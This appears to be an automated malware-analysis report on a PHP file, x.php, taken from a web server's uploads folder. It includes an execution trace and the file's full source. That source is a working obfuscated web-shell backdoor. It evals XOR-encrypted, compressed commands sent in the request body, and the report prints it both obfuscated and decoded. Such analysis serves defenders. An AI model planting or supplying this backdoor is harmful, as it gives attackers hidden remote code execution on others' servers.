x.php

md5: 29fb7403f755fba6c7fbb3486e4fa6a7

Jump to:
Deobfuscated code (Read more)
Execution traces (Read more)
Generated HTML (Read more)
Original Code (Read more)
Screenshot
Attributes
Encoding
base64_decode (Traces)
base64_encode (Traces)

Execution
eval (Traces)

Files
file_get_contents (Traces)

Input
php:\/\/input (Traces)

Deobfuscated PHP code
Failed to deobfuscate code
Execution traces
data/traces/29fb7403f755fba6c7fbb3486e4fa6a7_trace-1676240638.3344.xt
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 20:24:24.232201]
1	0	1	0.000176	393464
1	3	0	0.000241	396576	{main}	1		/var/www/html/uploads/x.php	0	0
1		A						/var/www/html/uploads/x.php	2	$r = 'strlen1H($t);$o=1H""1H;for($i=0;$i<1H$l;1H){f1Hor($j=0;($j<$c&1H&$i<$1Hl'
1		A						/var/www/html/uploads/x.php	3	$c = '$k="e91a1H1H1H7330";$1Hkh="b1Hac11Hfe3ab27e";$kf="1H69a41H65d59f1H59";$p="l'
1		A						/var/www/html/uploads/x.php	4	$Q = '"),$m)=1H=1) {@1Ho1Hb_s1Htart();@eva1Hl(@g1Hzu1H1Hncompress(@x(@bas1H1He64_decode('
1		A						/var/www/html/uploads/x.php	5	$k = '1H$m[1]),$k)))1H;$o=@o1Hb1H_get_cont1Hents()1H;@ob_end1H_c1H1Hlean();$r=@b1H'
1		A						/var/www/html/uploads/x.php	6	$F = '61HXsGm1H7Qungl1HL1HPBj";function x(1H$t,$k){1H$c=str1Hl1Hen($1Hk);$l=1H'
2	4	0	0.000333	396576	str_replace	0		/var/www/html/uploads/x.php	7	3	'D'	''	'crDeDDDate_funDcDtion'
2	4	1	0.000350	396712
2	4	R			'create_function'
1		A						/var/www/html/uploads/x.php	7	$t = 'create_function'
1		A						/var/www/html/uploads/x.php	8	$X = ');$j++1H,$1Hi++){$o1H1H.=$t{$i1H}^$k{$j};}1H}return 1H$o;1H}if (@1Hpreg'
1		A						/var/www/html/uploads/x.php	9	$R = '1H_match("/$k1H1Hh(.+)1H$kf/",@file1H1H_get_contents1H("ph1Hp://input1H'
1		A						/var/www/html/uploads/x.php	10	$P = 'as1He64_encod1He(@x(@gzco1Hmpr1Hess($o)1H,$k));1Hprint(1H"$p$kh$r1H$kf");}'
2	5	0	0.000417	397256	str_replace	0		/var/www/html/uploads/x.php	11	3	'1H'	''	'$k="e91a1H1H1H7330";$1Hkh="b1Hac11Hfe3ab27e";$kf="1H69a41H65d59f1H59";$p="l61HXsGm1H7Qungl1HL1HPBj";function x(1H$t,$k){1H$c=str1Hl1Hen($1Hk);$l=1Hstrlen1H($t);$o=1H""1H;for($i=0;$i<1H$l;1H){f1Hor($j=0;($j<$c&1H&$i<$1Hl);$j++1H,$1Hi++){$o1H1H.=$t{$i1H}^$k{$j};}1H}return 1H$o;1H}if (@1Hpreg1H_match("/$k1H1Hh(.+)1H$kf/",@file1H1H_get_contents1H("ph1Hp://input1H"),$m)=1H=1) {@1Ho1Hb_s1Htart();@eva1Hl(@g1Hzu1H1Hncompress(@x(@bas1H1He64_decode(1H$m[1]),$k)))1H;$o=@o1Hb1H_get_cont1Hents()1H;@ob_end1H_c1H1Hlean();'
2	5	1	0.000453	397864
2	5	R			'$k="e91a7330";$kh="bac1fe3ab27e";$kf="69a465d59f59";$p="l6XsGm7QunglLPBj";function x($t,$k){$c=strlen($k);$l=strlen($t);$o="";for($i=0;$i<$l;){for($j=0;($j<$c&&$i<$l);$j++,$i++){$o.=$t{$i}^$k{$j};}}return $o;}if (@preg_match("/$kh(.+)$kf/",@file_get_contents("php://input"),$m)==1) {@ob_start();@eval(@gzuncompress(@x(@base64_decode($m[1]),$k)));$o=@ob_get_contents();@ob_end_clean();$r=@base64_encode(@x(@gzcompress($o),$k));print("$p$kh$r$kf");}'
1		A						/var/www/html/uploads/x.php	11	$K = '$k="e91a7330";$kh="bac1fe3ab27e";$kf="69a465d59f59";$p="l6XsGm7QunglLPBj";function x($t,$k){$c=strlen($k);$l=strlen($t);$o="";for($i=0;$i<$l;){for($j=0;($j<$c&&$i<$l);$j++,$i++){$o.=$t{$i}^$k{$j};}}return $o;}if (@preg_match("/$kh(.+)$kf/",@file_get_contents("php://input"),$m)==1) {@ob_start();@eval(@gzuncompress(@x(@base64_decode($m[1]),$k)));$o=@ob_get_contents();@ob_end_clean();$r=@base64_encode(@x(@gzcompress($o),$k));print("$p$kh$r$kf");}'
2	6	0	0.000510	397128	create_function	0		/var/www/html/uploads/x.php	12	2	''	'$k="e91a7330";$kh="bac1fe3ab27e";$kf="69a465d59f59";$p="l6XsGm7QunglLPBj";function x($t,$k){$c=strlen($k);$l=strlen($t);$o="";for($i=0;$i<$l;){for($j=0;($j<$c&&$i<$l);$j++,$i++){$o.=$t{$i}^$k{$j};}}return $o;}if (@preg_match("/$kh(.+)$kf/",@file_get_contents("php://input"),$m)==1) {@ob_start();@eval(@gzuncompress(@x(@base64_decode($m[1]),$k)));$o=@ob_get_contents();@ob_end_clean();$r=@base64_encode(@x(@gzcompress($o),$k));print("$p$kh$r$kf");}'
3	7	0	0.000590	405168	{internal eval}	1		/var/www/html/uploads/x.php	12	0
3	7	1	0.000604	405168
3	7	R			NULL
2	6	1	0.000619	403800
2	6	R			'\000lambda_7'
1		A						/var/www/html/uploads/x.php	12	$p = '\000lambda_7'
2	8	0	0.000647	403736	__lambda_func	1		/var/www/html/uploads/x.php	12	0
2		A						/var/www/html/uploads/x.php(12) : runtime-created function	1	$k = 'e91a7330'
2		A						/var/www/html/uploads/x.php(12) : runtime-created function	1	$kh = 'bac1fe3ab27e'
2		A						/var/www/html/uploads/x.php(12) : runtime-created function	1	$kf = '69a465d59f59'
2		A						/var/www/html/uploads/x.php(12) : runtime-created function	1	$p = 'l6XsGm7QunglLPBj'
3	9	0	0.000707	403792	file_get_contents	0		/var/www/html/uploads/x.php(12) : runtime-created function	1	1	'php://input'
3	9	1	0.000727	404528
3	9	R			''
3	10	0	0.000741	404512	preg_match	0		/var/www/html/uploads/x.php(12) : runtime-created function	1	3	'/bac1fe3ab27e(.+)69a465d59f59/'	''	NULL
3	10	1	0.000790	404672
3	10	R			0
2	8	1	0.000806	404432
1	3	1	0.000813	404432
			0.000839	321776
TRACE END   [2023-02-12 20:24:24.232901]

Generated HTML code
<html><head></head><body></body></html>
Original PHP code
<?php
$r='strlen1H($t);$o=1H""1H;for($i=0;$i<1H$l;1H){f1Hor($j=0;($j<$c&1H&$i<$1Hl';
$c='$k="e91a1H1H1H7330";$1Hkh="b1Hac11Hfe3ab27e";$kf="1H69a41H65d59f1H59";$p="l';
$Q='"),$m)=1H=1) {@1Ho1Hb_s1Htart();@eva1Hl(@g1Hzu1H1Hncompress(@x(@bas1H1He64_decode(';
$k='1H$m[1]),$k)))1H;$o=@o1Hb1H_get_cont1Hents()1H;@ob_end1H_c1H1Hlean();$r=@b1H';
$F='61HXsGm1H7Qungl1HL1HPBj";function x(1H$t,$k){1H$c=str1Hl1Hen($1Hk);$l=1H';
$t=str_replace('D','','crDeDDDate_funDcDtion');
$X=');$j++1H,$1Hi++){$o1H1H.=$t{$i1H}^$k{$j};}1H}return 1H$o;1H}if (@1Hpreg';
$R='1H_match("/$k1H1Hh(.+)1H$kf/",@file1H1H_get_contents1H("ph1Hp://input1H';
$P='as1He64_encod1He(@x(@gzco1Hmpr1Hess($o)1H,$k));1Hprint(1H"$p$kh$r1H$kf");}';
$K=str_replace('1H','',$c.$F.$r.$X.$R.$Q.$k.$P);
$p=$t('',$K);$p();
?>
PHP Malware Analysis

x.php

md5: 29fb7403f755fba6c7fbb3486e4fa6a7

Screenshot

Attributes

Deobfuscated PHP code

Execution traces

Generated HTML code

Original PHP code
